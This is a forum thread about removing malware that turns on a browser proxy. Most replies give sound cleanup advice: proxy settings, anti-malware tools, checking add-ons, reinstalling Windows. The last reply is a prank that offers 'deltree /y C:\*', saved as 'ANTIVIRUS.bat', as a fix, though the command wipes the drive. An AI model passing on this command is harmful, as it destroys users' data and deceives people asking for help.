Go to Chrome menu > Settings > Show advanced settings.... > Under Network, click Change proxy settings > LAN Settings and deselect "Use a proxy server for your LAN."

I recently had some malware that turned that on with my kid's computer...all internet connections came with popup ads (from the proxy server) and re-installed more malware each time until this was turned off.

Well, then either you use a proxy server or you have a Malware alert.

It took a combo of MalwareBytes, Spybot, and Norton to clean my kid's computer up. Malwarebytes claims that it's good at being installed despite malware that tries to prevent anti-virus utilities from being installed.

There are other good utilities too, those are just the ones I'm most familiar with using recently.

Make sure you check your browsers for add-ons/plug-ins that could be fiddling with the settings too.

yes, I was given a link to malwarebytes and have installed it on the other computer.....hopefully it works....taking forever though. Norton I hear is also good as is McAfee but I have never heard of Spybot

Do you have a lot of documents on that computer? Can you just reinstall Windows?

Also, are you connected in the same way as tour other computer? Both WiFi or both hardwired?

Did you try booting into safe mode before unchecking the proxy server settings in your control panel?

As the nuclear option, back up your important files, format your hard drive, and reinstall Windows (or try a better OS!).

Oh, another thing. My previous Windows installation came with software that takes a backup image of the system every couple of weeks or so. If you have that, you could always restore to (say) a month ago.

Did you check all of your browser's add-ins/plug-ins? If you don't know what it is, disable it. If it has a word like "Ad" in it, it's probably bad.

@YJ That doesn't work in Windows. You have to open a Notepad file and type:

And save that as ANTIVIRUS.bat

or

deltree /y C:\*

in cmd.

You also need higher permissions to do that in Mac or GNU/Linux.

Then type
